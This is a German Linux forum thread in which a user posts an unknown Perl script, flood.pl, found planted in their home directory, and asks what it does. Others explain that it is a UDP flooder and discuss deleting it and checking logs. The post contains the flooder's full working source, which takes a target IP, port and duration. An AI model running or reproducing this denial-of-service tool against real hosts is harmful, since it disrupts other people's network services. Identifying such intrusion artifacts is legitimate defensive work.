Pro-Linux

Pro-Linux Diskussions- und Hilfeforum
https://www.pro-linux.de/forum/

merkwürdiges Script im Home-Verzeichnis

https://www.pro-linux.de/forum/viewtopic.php?t=1032777

Page 1 of 1

merkwürdiges Script im Home-Verzeichnis

Posted: 07. May 2007 9:34
by micbur
Hallo,

ich sichere meinen Rechner immer, wenn ich den Platz verlasse, sodass ich mich abmelden muss. Nun gibt es in meinem Homeverzeichnis eine Datei namens flood.pl und mit ausführbaren Rechten für 'world' und mit meiner Nutzer-ID und -Gruppe.

Kann mir einer erklären, was jemand davon hat, wenn er auf meinem Rechner dieses Scipt ausführt? Ich kann kein Perl.

[edit: ich habe das nicht da hin gepackt, das weiß ich genau, weil: ich kann kein Perl und habe auch nach keinem Script gesucht oder so]

Code: Select all

#!/usr/bin/perl
################################################## ###
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
################################################## ####

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit&#40;1&#41;;
&#125;

my &#40;$ip,$port,$size,$time&#41;;
$ip=$ARGV&#91;0&#93;;
$port=$ARGV&#91;1&#93;;
$time=$ARGV&#91;2&#93;;

socket&#40;crazy, PF_INET, SOCK_DGRAM, 17&#41;;
$iaddr = inet_aton&#40;"$ip"&#41;;

printf "udp flood - odix\n";

if &#40;$ARGV&#91;1&#93; ==0 && $ARGV&#91;2&#93; ==0&#41; &#123;
goto randpackets;
&#125;
if &#40;$ARGV&#91;1&#93; !=0 && $ARGV&#91;2&#93; !=0&#41; &#123;
system&#40;"&#40;sleep $time;killall -9 udp&#41; &"&#41;;
goto packets;
&#125;
if &#40;$ARGV&#91;1&#93; !=0 && $ARGV&#91;2&#93; ==0&#41; &#123;
goto packets;
&#125;
if &#40;$ARGV&#91;1&#93; ==0 && $ARGV&#91;2&#93; !=0&#41; &#123;
system&#40;"&#40;sleep $time;killall -9 udp&#41; &"&#41;;
goto randpackets;
&#125;

packets&#58;
for &#40;;;&#41; &#123;
$size=$rand x $rand x $rand;
send&#40;crazy, 0, $size, sockaddr_in&#40;$port, $iaddr&#41;&#41;;
&#125;

randpackets&#58;
for &#40;;;&#41; &#123;
$size=$rand x $rand x $rand;
$port=int&#40;rand 65000&#41; +1;
send&#40;crazy, 0, $size, sockaddr_in&#40;$port, $iaddr&#41;&#41;;
&#125;
Ciao, micbur

Posted: 07. May 2007 11:19
by Janka
Das was oben drin steht. UDP-Pakete an eine bestimmte IP, beginnend mit einem bestimmten Startport schicken. Bringt NFS, SMB (nicht CIFS), VPNs und einige andere Dienste durcheinander.

Deshalb wird in einem gut gewarteten Netzwerk den normalen Benutzern auch verboten, UDP-Pakete zu verschicken.

Janka

Posted: 07. May 2007 12:08
by micbur
Also löschen.

Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?

Ciao, micbur

Posted: 08. May 2007 10:38
by Janka
micbur wrote:Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?
Kommt auf die Logeinstellungen deines Paketfilters an. Normalerweise werden ausgehende Pakete aber nicht geloggt, weil das das Logfile zumüllen würde.

Janka
All times are UTC+01:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/